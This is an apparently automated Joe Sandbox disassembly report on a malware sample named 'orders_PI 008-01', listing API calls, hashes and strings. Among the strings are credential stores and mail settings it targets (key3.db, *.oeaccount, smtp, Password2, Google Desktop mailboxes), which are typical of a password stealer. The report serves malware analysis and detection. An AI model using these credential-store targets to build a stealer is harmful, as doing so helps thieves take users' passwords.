                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Color$BrushClassModeNameText_strcmpimemset
                                        • String ID:
                                        • API String ID: 2775283111-0
                                        • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                        • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                        • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                        • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: winSeekFile$winTruncate1$winTruncate2
                                        • API String ID: 885266447-2471937615
                                        • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                        • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                        • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                        • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                        APIs
                                          • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                        • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                        • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                          • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                          • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                          • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$??2@??3@CloseCreateHandleReadSize
                                        • String ID: Ul@$key3.db
                                        • API String ID: 1968906679-1563549157
                                        • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                        • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                        • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                        • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                        APIs
                                        • _strcmpi.MSVCRT ref: 0040E134
                                        • _strcmpi.MSVCRT ref: 0040E14D
                                        • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strcmpi$_mbscpy
                                        • String ID: smtp
                                        • API String ID: 2625860049-60245459
                                        • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                        • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                        • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                        • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                        APIs
                                          • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                        • memset.MSVCRT ref: 00408258
                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                        Strings
                                        • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Close$EnumOpenmemset
                                        • String ID: Software\Google\Google Desktop\Mailboxes
                                        • API String ID: 2255314230-2212045309
                                        • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                        • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                        • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                        • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                        APIs
                                        • memset.MSVCRT ref: 0040C28C
                                        • SetFocus.USER32(?,?), ref: 0040C314
                                          • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FocusMessagePostmemset
                                        • String ID: S_@$l
                                        • API String ID: 3436799508-4018740455
                                        • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                        • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                        • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                        • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy
                                        • String ID: C^@$X$ini
                                        • API String ID: 714388716-917056472
                                        • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                        • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                        • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                        • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                        APIs
                                          • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                          • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                        • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                        • String ID: MS Sans Serif
                                        • API String ID: 3492281209-168460110
                                        • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                        • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                        • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                        • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ClassName_strcmpimemset
                                        • String ID: edit
                                        • API String ID: 275601554-2167791130
                                        • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                        • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                        • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                        • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen$_mbscat
                                        • String ID: 3CD
                                        • API String ID: 3951308622-1938365332
                                        • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                        • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                        • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                        • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscat$_mbscpy
                                        • String ID: Password2
                                        • API String ID: 2600922555-1856559283
                                        • Opcode ID: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                        • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                        • Opcode Fuzzy Hash: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                        • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                        APIs
                                        • LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75570A60,?,00000000), ref: 00410D1C
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: SHGetSpecialFolderPathA$shell32.dll
                                        • API String ID: 2574300362-543337301
                                        • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                        • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                        • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                        • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: rows deleted
                                        • API String ID: 2221118986-571615504
                                        • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                        • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                        • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                        • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                        APIs
                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memcmp
                                        • String ID:
                                        • API String ID: 3384217055-0
                                        • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                        • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                        • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                        • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                        APIs
                                          • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                        • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                        • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$memset
                                        • String ID:
                                        • API String ID: 1860491036-0
                                        • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                        • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                        • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                        • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                        APIs
                                        • memset.MSVCRT ref: 004048C2
                                        • memset.MSVCRT ref: 004048D6
                                        • memset.MSVCRT ref: 004048EA
                                        • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                        • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID:
                                        • API String ID: 368790112-0
                                        • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                        • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                        • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                        • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                        APIs
                                        • memset.MSVCRT ref: 0040D2C2
                                        • memset.MSVCRT ref: 0040D2D8
                                        • memset.MSVCRT ref: 0040D2EA
                                        • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                        • memset.MSVCRT ref: 0040D319
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID:
                                        • API String ID: 368790112-0
                                        • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                        • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                        • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                        • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                        APIs
                                        • __allrem.LIBCMT ref: 00425850
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                        • __allrem.LIBCMT ref: 00425933
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                        • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                        • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                        • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                        APIs
                                        Strings
                                        • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                        • too many SQL variables, xrefs: 0042C6FD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                        • API String ID: 2221118986-515162456
                                        • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                        • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                        • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                        • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                        APIs
                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                        • memset.MSVCRT ref: 004026AD
                                          • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                          • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                          • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                          • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                        • LocalFree.KERNEL32(?), ref: 004027A6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                        • String ID:
                                        • API String ID: 3503910906-0
                                        • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                        • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                        • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                        • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                        APIs
                                          • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                          • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                        • free.MSVCRT ref: 00407D7C
                                          • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
                                          • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                          • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,`Wu,00407A43,00000001,?,00000000,`Wu,00407DBD,00000000,?,?), ref: 00406F64
                                          • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpy
                                        • String ID: `Wu$`Wu$`Wu
                                        • API String ID: 3401966785-1094851910
                                        • Opcode ID: 27aafa6304bec9719526772739a65833492d8f24c74b3a52ddc2ddb19e3e0dc7
                                        • Instruction ID: d7b0144154ef41658eb0158d6140425370aaa91bbe4ae82c15578abe9a627f9f
                                        • Opcode Fuzzy Hash: 27aafa6304bec9719526772739a65833492d8f24c74b3a52ddc2ddb19e3e0dc7
                                        • Instruction Fuzzy Hash: DF5148B5D0821AAFCB109F99D4809ADFBB1BF44314B24817BE950B7391C738BE45CB96
                                        APIs
                                        • memset.MSVCRT ref: 0040C922
                                        • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                        • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
